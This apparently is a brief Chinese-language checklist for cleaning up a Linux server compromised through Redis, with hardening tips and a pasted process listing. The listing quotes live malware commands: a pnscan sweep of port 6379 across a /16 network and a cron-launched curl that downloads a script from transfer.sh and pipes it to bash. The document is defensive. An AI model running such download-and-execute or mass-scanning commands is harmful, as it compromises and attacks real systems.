1. tmp 目录下面
2. 定时任务查找一下 crontab -e
3. 病毒要下载 ps -ef|egrep "curl|wget" 查看是否有下载的命令
4. top 一下看一下哪个占用cpu最高
5. 查找目标文件 find / -perm 777 目录下777 权限的文件
6. /etc/passwd下面的文件用户哪些可以登录,去掉不正常的可以登录用户/bin/bash
7.查看 /etc/rc.local 用户下面的开机自启动
8. 查看密钥是否被人动了,删除密钥没用的.redis中毒后果.
应对 :
1. cat /etc/hosts.allow 文件设置登录sshd的IP设置.
2.chattr +i 锁定 定时任务 锁定/root/.ssh/auth_key等文件
锁定 /etc/passwd文件
[root@localhost tmp]# ps -ef |grep pnscan
root 29073 5659 10 14:07 ? 00:00:02 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 31.105.0.0/16 6379
root 30141 4684 0 14:07 pts/1 00:00:00 grep pnscan
[root@localhost tmp]# ps -ef|egrep curl
root 5655 5653 0 Apr27 ? 00:00:00 /bin/sh -c curl -s https://transfer.sh/3EqNx/tmp.GewSw5ccS1 > .cmd && bash .cmd
root 7838 4684 0 13:56 pts/1 00:00:00 egrep curl